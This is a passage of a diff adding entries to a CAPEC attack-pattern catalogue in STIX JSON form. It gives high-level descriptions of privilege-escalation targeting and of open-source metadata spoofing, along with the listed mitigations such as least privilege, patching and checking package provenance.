The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-69", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/69.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Target Programs with Elevated Privileges", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find programs with elevated priveleges: The adversary probes for programs running with elevated privileges.

  2. Techniques
    Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.
  3. Find vulnerability in running program: The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.

  4. Techniques
    Look for improper input validation
    Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted program runs with elevated OS privileges.", + "The targeted program accepts input data from the user or from another program.", + "The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.", + "This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target." + ], + "x_capec_skills_required": { + "Low": "An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.", + "Medium": "More advanced attack may require knowledge of the protocol spoken by the host service." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the principle of least privilege.", + "id": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ac5e039-5b39-4762-baa6-db1436c0c113", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b71f57d-057f-4ba8-90a3-b82441f7ad5f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches.", + "id": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c3677a7-f6ef-4f6a-98f2-23a940c9d065", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. 
Only expose the services which are needed and have security mechanisms such as authentication built around them.", + "id": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3852cd85-fee0-458c-aa19-1ee065916045", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid revealing information about your system (e.g., version of the program) to anonymous users.", + "id": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f38ce3b-57b6-40fc-8b8c-08befcded00e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "spec_version": "2.1", + 
"target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.", + "id": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b4e5f04-ebe0-4a77-b851-5826990a4dda", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible use a sandbox model which limits the actions that programs can take. 
A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.", + "id": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f29e28aa-4464-4272-a547-4585c2e99452", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.", + "id": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5813c2bd-b132-4bc7-ae4d-5c4b492c361e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d245d4d1-c52c-41ba-aae5-782470e499d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect your log file from unauthorized modification and log forging.", + "id": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--66ca67c0-4eaa-438c-ba7f-8bbdd79867b4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.\n ", + "external_references": [ + { + "external_id": "CAPEC-690", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/690.html" + } + ], + "id": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Metadata Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_extended_description": "\n One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. 
Adversaries may spoof a variety of metadata across a number of resources, such as the following:\n \n Authors of Version Control System (VCS) repository commits\n Open source package statistics\n File attributes, such as when a file was last update\n \n The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_prerequisites": [ + "Identification of a resource whose metadata is to be spoofed" + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of metadata to convince victims the source is trusted" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate metadata of resources such as authors, timestamps, and statistics.", + "id": "course-of-action--bbb351b8-c841-43ed-a1b2-3c013423cbcb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f67d5c08-1228-4dda-ac82-d25218087376", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbb351b8-c841-43ed-a1b2-3c013423cbcb", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm the pedigree of open source packages and ensure the code being downloaded does not originate from another source.", + "id": "course-of-action--2c911ba7-6886-495c-ad24-be76d469d0c4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6aa6808-e8fd-4132-89a5-cfeb7dde7a23", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c911ba7-6886-495c-ad24-be76d469d0c4", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. 
Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.", + "id": "course-of-action--159fff7f-a612-4bd7-8053-34885f345613", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4cffa7b9-c3ff-4c3b-8de3-0d69142f8f2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--159fff7f-a612-4bd7-8053-34885f345613", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.\n ", + "external_references": [ + { + "external_id": "CAPEC-691", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/691.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + } + ], + "id": 
"attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Open-Source Software Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1", + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_child_of_refs": [ + "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data." + ], + "x_capec_extended_description": "\n Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. 
Examples of metadata that may be spoofed include:\n \n Owner of the software (e.g., repository or package owner)\n Author(s) of repository commits\n Frequency of repository commits\n Date/Time of repository commits\n Package or Repository \"stars\"\n \n Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf" + ], + "x_capec_prerequisites": [ + "Identification of a popular open-source component whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of software metadata to convince victims the source is trusted." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source software, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--5c736e80-28c8-4d55-b991-897bf3b192ba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8cb9302a-26a3-4414-a0ec-5beaa7877ac3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c736e80-28c8-4d55-b991-897bf3b192ba", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Within package managers, look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--589123af-2f4a-4981-88a6-c053df0854f2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ea5d12b-fcc4-4245-9eee-ca5832c2631e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--589123af-2f4a-4981-88a6-c053df0854f2", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reference vulnerability databases to determine if the software contains known vulnerabilities.", + "id": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02e2a97b-b5be-463c-a796-c06ed1b69855", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software from reputable hosting sites or package managers.", + "id": "course-of-action--c80df8f5-a98b-488d-8935-509df5316146", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-3", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cf190319-afbe-49c3-8922-661ce1ebab46", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c80df8f5-a98b-488d-8935-509df5316146", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software that has been adequately signed by the developer(s). For repository commits/tags, look for the \"Verified\" status and for developers leveraging \"Vigilant Mode\" (GitHub) or similar modes.", + "id": "course-of-action--6766b25b-c346-4b4b-8542-35002e050f31", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae0bcd4e-8042-4166-a1e4-99ebd23a97fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6766b25b-c346-4b4b-8542-35002e050f31", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": 